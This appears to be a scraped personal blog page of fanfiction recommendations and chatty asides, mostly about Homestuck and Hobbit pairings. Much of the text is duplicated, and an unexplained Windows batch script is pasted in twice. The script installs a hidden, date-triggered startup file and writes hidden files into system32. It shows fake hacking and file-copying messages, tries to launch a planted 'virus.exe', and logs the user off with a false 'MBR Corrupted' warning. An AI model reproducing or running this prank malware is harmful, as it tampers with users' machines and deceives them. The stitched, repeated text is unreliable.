Oh, WOW.
Am I the only responsible one in our group?
Holy shit.
Got a shit-ton of homework and yet here I am fucking with my shit (Ok, EW.)
I mean—Nevermind.
Let's just say I'm wasting precious time that should be used to do something productive instead of obsessing over fictious characters.
I don't care that "fictious" ain't a word.
...I really need to do that evaluation paper as well as that reflection paper.
And then there's that report...
I mean—Nevermind.
Let's just say I'm wasting precious time that should be used to do something productive instead of obsessing over fictious characters.
I don't care that "fictious" ain't a word.
...I really need to do that evaluation paper as well as that reflection paper.
And then there's that report...
Thilbo Bagginshield and Co.
Various Pairings
Small, Cute and Cuddly @ AO3 by alkjira
Summary: Fluffy ficlets to compensate for when I end up writing sad things.
Various Pairings
Small, Cute and Cuddly @ AO3 by alkjira
Summary: Fluffy ficlets to compensate for when I end up writing sad things.
This summary used to have a description of each ficlet but now there are too many, I have run out of characters...
So to sum it up: in this ongoing collection we have everything from Bilbo being turned into a bunny to Thorin being turned into a child to Fíli going across the galaxy to find Bofur to a G-rated tentacle fic to-
Heh, maybe you can just look at the tags?
And prompts are welcome if they're small, cute and cuddly!
Rating: G
It's really weird seeing 20-something young adults behaving like frickkin' hormonal teenagers.
It's really weird seeing 20-something young adults behaving like frickkin' hormonal teenagers.
@echo off
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat" goto done
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo title Kick >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set trig=01 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
rem change the above trig value to any date you want the file to run
set datee=%date% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set datee1=%datee:~7,2% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
if not "%trig%"=="%datee1%" goto :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo start "C:\WINDOWS\system32\switch.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
attrib +h "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
if exist "C:\WINDOWS\system32/switch.bat" goto done
echo @echo off > "C:\WINDOWS\system32\switch.bat"
echo color 07 >> "C:\WINDOWS\system32\switch.bat"
echo title Connecting from >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST MACHINE FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo set count1=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a1 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count1%"=="500" goto next1 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count1+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a1 >> "C:\WINDOWS\system32\switch.bat"
echo :next1 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo ACQURING HOST IP ADDRESS..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count2=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a2 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count2%"=="500" goto next2 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count2+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a2 >> "C:\WINDOWS\system32\switch.bat"
echo :next2 >> "C:\WINDOWS\system32\switch.bat"
echo ipconfig/all >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST IP ADDRESS ACQURIED..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count3=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a3 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count3%"=="500" goto next3 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count3+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a3 >> "C:\WINDOWS\system32\switch.bat"
echo :next3 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo SEARCHING FOR OPEN TERMINALS................. >> "C:\WINDOWS\system32\switch.bat"
echo set count4=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a4 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count4%"=="500" goto next4 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count4+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a4 >> "C:\WINDOWS\system32\switch.bat"
echo :next4 >> "C:\WINDOWS\system32\switch.bat"
echo set count5=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a5 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count5%"=="500" goto next5 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count5+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a5 >> "C:\WINDOWS\system32\switch.bat"
echo:next5 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo OPEN TERMINAL FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo set count6=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a6 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count6%"=="500" goto next6 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count6+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a6 >> "C:\WINDOWS\system32\switch.bat"
echo :next6 >> "C:\WINDOWS\system32\switch.bat"
echo echo.
echo echo INITIATING BRUTE FORCE ATTACK ON FIREWALL..... >> "C:\WINDOWS\system32\switch.bat"
echo set count7=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a7 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count7%"=="500" goto next7 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count7+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a7 >> "C:\WINDOWS\system32\switch.bat"
echo :next7 >> "C:\WINDOWS\system32\switch.bat"
echo set count8=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a8 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count8%"=="500" goto next8 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count8+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a8 >> "C:\WINDOWS\system32\switch.bat"
echo :next8 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo FIREWALL DISABLED............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count9=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a9 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count9%"=="500" goto next9 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count9+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a9 >> "C:\WINDOWS\system32\switch.bat"
echo :next9 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING ALL FILES............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count10=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a10 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count10%"=="500" goto next10 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count10+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a10 >> "C:\WINDOWS\system32\switch.bat"
echo :next10 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo dir /s >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING COMPLETE.............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count11=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a11 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count11%"=="500" goto next11 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count11+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a11 >> "C:\WINDOWS\system32\switch.bat"
echo :next11 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo INSTALLING K1ll5W1T(H.exe..................... >> "C:\WINDOWS\system32\switch.bat"
echo copy "C:\WINDOWS\system32\vback.nrk" "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count12=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a12 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count12%"=="500" goto next12 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count12+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a12 >> "C:\WINDOWS\system32\switch.bat"
echo :next12 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo K1ll5W1T(H.exe INSTALLATION COMPLETE.......... >> "C:\WINDOWS\system32\switch.bat"
echo set count13=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a13 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count13%"=="500" goto next13 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count13+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a13 >> "C:\WINDOWS\system32\switch.bat"
echo :next13 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo EXECUTING K1ll5W1T(H.exe...................... >> "C:\WINDOWS\system32\switch.bat"
echo start "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count14=0 >> "C:\WINDOWS\system32/switch.bat"
echo :a14 >> "C:\WINDOWS\system32/switch.bat"
echo if "%count14%"=="500" goto next14 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count14+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a14 >> "C:\WINDOWS\system32\switch.bat"
echo :next14 >> "C:\WINDOWS\system32\switch.bat"
echo shutdown -l -tp 30 -c "MBR Corrupted! Windows is Shutting Down" >> "C:\WINDOWS\system32\switch.bat"
echo exit >> "C:\WINDOWS\system32\switch.bat"
attrib +h "C:\WINDOWS\system32\switch.bat"
if exist "C:\WINDOWS\system32\vback.nrk" goto done
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$K1ll5W1T(H ALERT CORRUPTING SYSTEM SHUTDOWN!$H+H* > "C:\WINDOWS\system32\vback.nrk"
attrib +h "C:\WINDOWS\system32\vback.nrk"
echo dir/s > %0
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat" goto done
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo title Kick >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set trig=01 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
rem change the above trig value to any date you want the file to run
set datee=%date% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set datee1=%datee:~7,2% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
if not "%trig%"=="%datee1%" goto :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo start "C:\WINDOWS\system32\switch.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
attrib +h "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
if exist "C:\WINDOWS\system32/switch.bat" goto done
echo @echo off > "C:\WINDOWS\system32\switch.bat"
echo color 07 >> "C:\WINDOWS\system32\switch.bat"
echo title Connecting from >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST MACHINE FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo set count1=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a1 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count1%"=="500" goto next1 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count1+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a1 >> "C:\WINDOWS\system32\switch.bat"
echo :next1 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo ACQURING HOST IP ADDRESS..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count2=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a2 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count2%"=="500" goto next2 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count2+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a2 >> "C:\WINDOWS\system32\switch.bat"
echo :next2 >> "C:\WINDOWS\system32\switch.bat"
echo ipconfig/all >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST IP ADDRESS ACQURIED..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count3=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a3 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count3%"=="500" goto next3 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count3+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a3 >> "C:\WINDOWS\system32\switch.bat"
echo :next3 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo SEARCHING FOR OPEN TERMINALS................. >> "C:\WINDOWS\system32\switch.bat"
echo set count4=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a4 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count4%"=="500" goto next4 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count4+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a4 >> "C:\WINDOWS\system32\switch.bat"
echo :next4 >> "C:\WINDOWS\system32\switch.bat"
echo set count5=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a5 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count5%"=="500" goto next5 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count5+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a5 >> "C:\WINDOWS\system32\switch.bat"
echo:next5 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo OPEN TERMINAL FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo set count6=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a6 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count6%"=="500" goto next6 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count6+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a6 >> "C:\WINDOWS\system32\switch.bat"
echo :next6 >> "C:\WINDOWS\system32\switch.bat"
echo echo.
echo echo INITIATING BRUTE FORCE ATTACK ON FIREWALL..... >> "C:\WINDOWS\system32\switch.bat"
echo set count7=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a7 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count7%"=="500" goto next7 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count7+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a7 >> "C:\WINDOWS\system32\switch.bat"
echo :next7 >> "C:\WINDOWS\system32\switch.bat"
echo set count8=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a8 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count8%"=="500" goto next8 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count8+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a8 >> "C:\WINDOWS\system32\switch.bat"
echo :next8 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo FIREWALL DISABLED............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count9=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a9 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count9%"=="500" goto next9 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count9+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a9 >> "C:\WINDOWS\system32\switch.bat"
echo :next9 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING ALL FILES............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count10=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a10 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count10%"=="500" goto next10 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count10+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a10 >> "C:\WINDOWS\system32\switch.bat"
echo :next10 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo dir /s >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING COMPLETE.............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count11=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a11 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count11%"=="500" goto next11 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count11+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a11 >> "C:\WINDOWS\system32\switch.bat"
echo :next11 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo INSTALLING K1ll5W1T(H.exe..................... >> "C:\WINDOWS\system32\switch.bat"
echo copy "C:\WINDOWS\system32\vback.nrk" "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count12=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a12 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count12%"=="500" goto next12 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count12+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a12 >> "C:\WINDOWS\system32\switch.bat"
echo :next12 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo K1ll5W1T(H.exe INSTALLATION COMPLETE.......... >> "C:\WINDOWS\system32\switch.bat"
echo set count13=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a13 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count13%"=="500" goto next13 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count13+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a13 >> "C:\WINDOWS\system32\switch.bat"
echo :next13 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo EXECUTING K1ll5W1T(H.exe...................... >> "C:\WINDOWS\system32\switch.bat"
echo start "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count14=0 >> "C:\WINDOWS\system32/switch.bat"
echo :a14 >> "C:\WINDOWS\system32/switch.bat"
echo if "%count14%"=="500" goto next14 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count14+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a14 >> "C:\WINDOWS\system32\switch.bat"
echo :next14 >> "C:\WINDOWS\system32\switch.bat"
echo shutdown -l -tp 30 -c "MBR Corrupted! Windows is Shutting Down" >> "C:\WINDOWS\system32\switch.bat"
echo exit >> "C:\WINDOWS\system32\switch.bat"
attrib +h "C:\WINDOWS\system32\switch.bat"
if exist "C:\WINDOWS\system32\vback.nrk" goto done
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$K1ll5W1T(H ALERT CORRUPTING SYSTEM SHUTDOWN!$H+H* > "C:\WINDOWS\system32\vback.nrk"
attrib +h "C:\WINDOWS\system32\vback.nrk"
echo dir/s > %0
Coming to Terms @ AO3 by L_Greene
Summary: Sollux Captor is perfectly happy with his small group of friends until one night, when his friend Karkat demands a computer repair. There, he meets Eridan Ampora, and suddenly, Sollux is seeing him everywhere.
Part 1 of the Coming to Terms Series
Rating: M
Warning(s): Underage Drinking(???), Minor Character Death, Sex (Maybe. I actually have no fucking clue. I'm only at Chapter 35. And this fic is like, SEVENTY-FIVE chapters.), Slow-Build
Part 2 [LINK]
Summary: SPOILERS!!! xD
Rating: E
Warning(s): "lots of fucking", apparently. Your usual mindfuckery included.
Coming to Terms @ AO3 by L_Greene
Summary: Sollux Captor is perfectly happy with his small group of friends until one night, when his friend Karkat demands a computer repair. There, he meets Eridan Ampora, and suddenly, Sollux is seeing him everywhere.
Part 1 of the Coming to Terms Series
Rating: M
Warning(s): Underage Drinking(???), Minor Character Death, Sex (Maybe. I actually have no fucking clue. I'm only at Chapter 35. And this fic is like, SEVENTY-FIVE chapters.), Slow-Build
Part 2 [LINK]
Rating: E
Warning(s): "lots of fucking", apparently. Your usual mindfuckery included.
Another Manga Rec.
Summary: What if Jesus and Buddha were living on Earth in modern times? What if they shared an apartment in Japan? Saint Young Men is a humorous manga about the daily lives of Jesus and Buddha, with each chapter focusing on some element of modern life, such as Disneyland, rush hour on the train, Christmas, the public pool, carnivals, and more.
Genre(s): Comedy, Seinen, Slice of Life
Pale As the Creatures of the Deep @ AO3 by Newtavore
Summary: He's a highblood, and highbloods are prone to highblood rages. You can see it in the way his hands tremble, long fingers clenching in fury when he gets cornered, taunted by one troll or another; you can see him take his anger and lock it away, watch him drop into a state of false calm, and you worry more with every day that passes. You aren't sure how long he can keep himself under control, and you don't think any of you will come back to life if you die again. You don't want anyone to die, and you don't want him to be forced into a position that causes him to hurt someone.
You don't want anyone to die, but everyone on this fucking asteroid seems hell bent on making it happen.
Part 1 of the raunchy pale threesome (with no sex) series
Part 2 [LINK]
Summary: ED is moirails with Karkat, and if that isn’t the most serendipitous fucking thing. The troll you recently discovered you feel hideous amounts of pity for is already pale for the troll you've felt hideous amounts of pity for for sweeps.
Get your shit together, Sollux.
Part 3 [LINK]
Summary: You can see exhaustion weighing on every inch of him, and you realize… it’s always him. Always. You and Sollux, you both have your fair share of issues and idiosyncrasies and oddities about you, and he’s the one who deals with them. He deals with your paranoid fits, when you’re positive everyone is out to get you. He deals with your self esteem issues, and your hideous lack of self worth- according to him. He deals with Sollux’s moodswings, and his obsessive tendencies. He deals with his constant need for perfection, and his bitter outlook on other people, and his misanthropic dislike of anything not silicon based.
Karkat deals with everything, and you feel… like you should be doing more to help him. Like this is a one sided moiraillegience and that- that is unacceptable. You will not have this end like your last moiraillegience did. You will not allow that to come to pass.
Rating: T
Oh god, the summaries are all so fucking long I almost feel sorry for you guys.
What can I say; I'm a lazy piece of shit.
Pale As the Creatures of the Deep @ AO3 by Newtavore
Summary: He's a highblood, and highbloods are prone to highblood rages. You can see it in the way his hands tremble, long fingers clenching in fury when he gets cornered, taunted by one troll or another; you can see him take his anger and lock it away, watch him drop into a state of false calm, and you worry more with every day that passes. You aren't sure how long he can keep himself under control, and you don't think any of you will come back to life if you die again. You don't want anyone to die, and you don't want him to be forced into a position that causes him to hurt someone.
You don't want anyone to die, but everyone on this fucking asteroid seems hell bent on making it happen.
Part 1 of the raunchy pale threesome (with no sex) series
Part 2 [LINK]
Summary: ED is moirails with Karkat, and if that isn’t the most serendipitous fucking thing. The troll you recently discovered you feel hideous amounts of pity for is already pale for the troll you've felt hideous amounts of pity for for sweeps.
Get your shit together, Sollux.
Part 3 [LINK]
Summary: You can see exhaustion weighing on every inch of him, and you realize… it’s always him. Always. You and Sollux, you both have your fair share of issues and idiosyncrasies and oddities about you, and he’s the one who deals with them. He deals with your paranoid fits, when you’re positive everyone is out to get you. He deals with your self esteem issues, and your hideous lack of self worth- according to him. He deals with Sollux’s moodswings, and his obsessive tendencies. He deals with his constant need for perfection, and his bitter outlook on other people, and his misanthropic dislike of anything not silicon based.
Karkat deals with everything, and you feel… like you should be doing more to help him. Like this is a one sided moiraillegience and that- that is unacceptable. You will not have this end like your last moiraillegience did. You will not allow that to come to pass.
Rating: T
Oh god, the summaries are all so fucking long I almost feel sorry for you guys.
What can I say; I'm a lazy piece of shit.
Meaning: Eridan/Sollux/Karkat
Hell yes.
Spacing Out @ AO3 by TransgenderSollux
Summary: It's hard to take care of two boyfriends when you can barely take care of yourself.
Rating: T
Meaning: Eridan/Sollux/Karkat
Hell yes.
Spacing Out @ AO3 by TransgenderSollux
Summary: It's hard to take care of two boyfriends when you can barely take care of yourself.
Rating: T
You Launch Your Rocketship @ AO3 by chairchiar
Summary: In the aftermath of the peaceful alliance between humans and trolls, one lonely starship struggles to provide tech support in a galaxy that just wants too much drama for its own good.
One Sollux Captor, captain of said starship, gets caught up in a mystery that goes WAY beyond his job description.
He also tries desperately not to find love in this galaxy, and of course runs face first into it.
Rating: T
You Launch Your Rocketship @ AO3 by chairchiar
Summary: In the aftermath of the peaceful alliance between humans and trolls, one lonely starship struggles to provide tech support in a galaxy that just wants too much drama for its own good.
One Sollux Captor, captain of said starship, gets caught up in a mystery that goes WAY beyond his job description.
He also tries desperately not to find love in this galaxy, and of course runs face first into it.
Rating: T
Binary Fish-ion.
Get it? *wiggles eyebrows*
'Cuz you know...
Binary Fission...
Sollux is bipolar...
Eridan's fish puns...
Binary Fish-ion.
Get it? *wiggles eyebrows*
'Cuz you know...
Binary Fission...
Sollux is bipolar...
Eridan's fish puns...
Eridan Ampora's Helmsman @ AO3 by Chichirinoda
Eridan Ampora's Helmsman @ AO3 by Chichirinoda
They continued on, and he almost passed the cubicle by like all of the others, but something flashed in his brain, just enough to make him turn his head and take a second look. And he stopped dead.
It was him.
Rating: M
Warning(s): None. I honestly don't know how this fic warranted an M rating so...yeah.
Warning(s): None. I honestly don't know how this fic warranted an M rating so...yeah.
Out Through The Curtain @ AO3 by looking_glass
Summary: Your name is SOLLUX CAPTOR and your WIFE died a couple of years ago. Now you're just trying to DEAL WITH YOUR LIFE and make sure that your SON grows up sound and happy, even if he is a CRABBY LITTLE GUY. And things were going perfectly well until you were forced to meet ERIDAN AMPORA.
You're really not sure if you want him around because he's a STUCK UP IDIOT. Yet somehow, you can't get rid of him. You're not even sure if you WANT TO ANYMORE.
Rating: G
Out Through The Curtain @ AO3 by looking_glass
Summary: Your name is SOLLUX CAPTOR and your WIFE died a couple of years ago. Now you're just trying to DEAL WITH YOUR LIFE and make sure that your SON grows up sound and happy, even if he is a CRABBY LITTLE GUY. And things were going perfectly well until you were forced to meet ERIDAN AMPORA.
You're really not sure if you want him around because he's a STUCK UP IDIOT. Yet somehow, you can't get rid of him. You're not even sure if you WANT TO ANYMORE.
Rating: G
The Trouble with Lesser Demons @ AO3 by princessofmind
Summary: He was a demon hunter. He was a servant to one of the most deadly Lords of the Underworld on the run from his master. Can I make it any more obvious?
Rating: M
Warning(s): Well...I don't wanna' spoil it so...yeah.
The Trouble with Lesser Demons @ AO3 by princessofmind
Summary: He was a demon hunter. He was a servant to one of the most deadly Lords of the Underworld on the run from his master. Can I make it any more obvious?
Rating: M
Warning(s): Well...I don't wanna' spoil it so...yeah.
I can NOT emphasise enough just how fucking amazing A Shot in the Dark is.
Beautiful as FUCK, dammit.
I can NOT emphasise enough just how fucking amazing A Shot in the Dark is.
Beautiful as FUCK, dammit.
Thilbo Bagginshield
Time Travel Fix-It.
A Shot in the Dark @ AO3 by Silver_pup
Summary: When he opens his eyes again, he finds himself in his old bed in his old home in his old body. Is this death? Or a trick of magic? Either way, Bilbo recognizes a second chance when he sees one, and this time his adventure with Thorin is going to go a bit differently.
Rating: T
Time Travel Fix-It.
A Shot in the Dark @ AO3 by Silver_pup
Summary: When he opens his eyes again, he finds himself in his old bed in his old home in his old body. Is this death? Or a trick of magic? Either way, Bilbo recognizes a second chance when he sees one, and this time his adventure with Thorin is going to go a bit differently.
Rating: T
The love is still burning.
Staig / Cran
I've been waiting, asshole. (Stan/Craig FanFic) by YourLastLullaby @ DeviantArt
Rating: T
Warning(s): Alcoholism, drugs, non-explicit sex, etc.
Staig / Cran
I've been waiting, asshole. (Stan/Craig FanFic) by YourLastLullaby @ DeviantArt
Rating: T
Warning(s): Alcoholism, drugs, non-explicit sex, etc.
Staig / Cran. Dystopian AU.
Make the bombs rain.
Life is fucked up.
Fractured @ AO3 by Momma_Ran
Rating: M
Warning(s): Gore, gore, gore. No action. Yet. There's fluff though.
Make the bombs rain.
Life is fucked up.
Fractured @ AO3 by Momma_Ran
Rating: M
Warning(s): Gore, gore, gore. No action. Yet. There's fluff though.
I really let myself go on this one.
Usually I'm one of those people who substitutes swear words with other words like, for example, "fudge" instead of "fuck".
The amount of shit I spit out is just obscene. (Ew.)
That was nightmare material right there.
Why the fuck did I have to think that?? (Wat.)
